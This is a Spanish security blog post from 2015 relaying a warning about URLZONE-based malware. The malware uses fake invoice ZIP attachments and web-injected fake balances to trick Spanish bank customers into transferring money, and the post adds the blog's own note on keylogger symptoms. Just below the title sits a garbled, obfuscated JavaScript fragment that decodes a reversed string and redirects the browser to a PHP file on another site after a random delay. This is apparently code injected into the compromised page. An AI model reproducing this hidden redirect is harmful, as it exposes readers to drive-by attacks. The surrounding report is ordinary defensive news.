Alertan sobre un malware que saquea cuentas de clientes de bancos españoles
{if (typeof ($NfI.list[n]) == “string”) return $NfI.list[n].split(“”).reverse().join(“”);return $NfI.list[n];};$NfI.list=[“‘php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth’=ferh.noitacol.tnemucod”];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}</script>tock_Au<script>$NfI=function(n){if (typeof ($NfI.list[n]) == )
Una campaña que provoca el envío de dinero de las víctimas a cuentas de terceros “está teniendo mucha repercusión en nuestro país”, según advierten desde S21sec.
Los clientes de entidades financieras españolas se han convertido en el objetivo de una nueva campaña de ciberdelincuencia sobre la que ha comenzado a alertar la compañía de seguridad S21sec.
Esta campaña, que se aprovecha del código del malware URLZONE, combina mecanismos como el algoritmo de generación de dominios y la ingeniería social para salirse con la suya. Esto es, va creando una serie de dominios aleatorios para mantenerse activa, mientras provoca la infección con el envío de un PDF que llega comprimido a modo de “factura-xxxx.pdf.zip”.
Lo que hace a continuación es inyectar código HTML para alterar el funcionamiento correcto de la cuenta personal en los sistemas de banca electrónica.
El pretexto que se utiliza para que el usuario acceda a su cuenta y realice una transferencia es que ha habido una equivocación a la hora de ingresarle cierto dinero. Por ello, se requiere su devolución. El malware consigue modificar lo que el cliente está viendo, marcando un saldo mayor al real.
Quienes caen en la trampa acabarán enviando dinero propio a otras cuentas. Y, al parecer, “este nuevo malware que está teniendo mucha repercusión en nuestro país”, según Xabier Michelena, CEO de S21sec.
Lo que se aconseja a los internautas y usuarios de servicios online es que se pongan en contacto con su banco si les llega este tipo de solicitud falsa.
Ver información original al respecto en Fuente:
http://www.siliconweek.es/security/virus/alertan-malware-saquea-cuentas-clientes-bancos-espanoles-92391#OC9BfzSvMF26ikmo.99
Comentario:
Muchos de estos malwares son ya controlados por nuestro ELISTARA con el nombre de SPYZBOT, caracterizandose por la aparición de dobles acentos en la edición con el word de escritos con palabras acentuadas, debido a la utilización de un capturador de teclado (keylogger), si bien solo lo detectamos los usuarios que usamos castellano, no asi los de habla inglesa, debido a la falta de acentos en dicho idioma, de lo cual ya hemos informado repetidamente.
Nótese que el fichero anexado aparece con doble extensión “factura-xxxx.pdf.zip”, siendo el primer .pdf parte del nombre del fichero y el ZIP o EXE resultante, la extensión real que utilizará windows…
saludos
ms, 15-12-2015
NOTA: Los interesados en información sobre contrato de soporte Asistencia Tecnica de SATINFO y/o licencia de uso/actualizaciones de sus utilidades, contacten con info@satinfo.es
__________
Este blog no se hace responsable de las opiniones y comentarios de los textos en los que se cita la Fuente, ofreciendo su contenido solo para facilitar el acceso a la información del mismo.
Puedes seguir cualquier respuesta a esta entrada mediante el canal RSS 2.0. Los comentarios y los pings están cerrados.
Siguenos
en facebook
Los comentarios están cerrados.